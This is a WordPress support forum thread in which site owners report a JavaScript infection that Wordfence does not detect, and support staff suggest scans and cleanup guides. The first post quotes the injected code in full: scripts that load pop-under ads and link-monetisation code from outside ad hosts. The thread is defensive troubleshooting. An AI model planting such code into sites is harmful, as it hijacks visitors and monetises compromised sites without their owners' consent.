Cutwin Javascript Infection – not detected by Wordfence

  • Resolved Tim Lord

    (@timlord)


    7 years, 1 month ago

    Hi there,
    I have recently come across an infection on a website I have been trying to repair and it is frustrating as the infection seems to pass right through Wordfence as though there is not a problem.

    The infection adds a javascript code in to every page, post, custom post type and image on the website – literally everything it possibly can do!

    I haven’t been able to (as of yet) determine where the infection has come from, as the plugins that are in use on the website are the same plugins used on other sites that have not been infected and are latest versions.

    I’ve also scanned the site not only with Wordfence but with Anti-Malware from GOTMLS.NET and nothing was found.

    An example of the javascript that is added in every image is contained below

    <script type="text/javascript">
            var adlinkfly_url = 'https://cutwin.com/';
            var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
            var adlinkfly_advert = 2;
            var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
        </script>
        
        <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1086384"></script>//<![CDATA[ 
(function() {
    var configuration = {
    "token": "11f0dc1ed8453e409e04d86bea962f34",
    "exitScript": {
        "enabled": true
    },
    "popUnder": {
        "enabled": true
    }
};
    var script = document.createElement('script');
    script.async = true;
    script.src = '//cdn.shorte.st/link-converter.min.js';
    script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
    var entry = document.getElementsByTagName('script')[0];
    entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync='false' type='text/javascript' src='//p80227.clksite.com/adServe/banners?tid=80227_250494_0&tagid=2'></script>

    Any ideas or suggestions on this would be extremely welcome

Viewing 6 replies - 1 through 6 (of 6 total)

  • Hi @timlord,

    Thanks for bringing this to our attention.

    Can you confirm the “Scan image files as if they were executable” is enabled?

    Could you please try and follow the steps outlined in our site cleaning guide.

    In case the scan still doesn’t report the infected files, please send the code snippets to samples[at]wordfence[dot]com.

    Thread Starter Tim Lord

    (@timlord)

    Hi there,
    Yes I can confirm that the “scan image files as if they were executable” was enabled.
    My Wordefence has just upgraded itself to the latest version and I am about to see if this version will now detect anything – I’ll let you know.

    I have gone through the cleaning guide previously but Wordfence is not detecting the javascript.

    I’ll send the code on to the email and let you know if the scan comes back with anything this time

    Thread Starter Tim Lord

    (@timlord)

    Just scanned again – it didn’t pick up a thing, i’ll email your support

    Hi,

    Yeah, I’ve got the same problem.

    Investigating further, I found that this script was on every page and post, and in the image descriptions.

    Bloody nightmare or what?

    On checking my phpmyadmin, I found that this script had been added into the postmeta and posts tables, and it looks like I’m going to have to restore a month-old database to get rid of it.

    • This reply was modified 7 years, 1 month ago by steveraven.

    Hi,

    I’m having the exact same problem and cannot find any solutions above. Has anyone resolved this?

    Many thanks,
    Michael

    Hi @mikka2000,

    Have you checked these guides?

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Cutwin Javascript Infection – not detected by Wordfence’ is closed to new replies.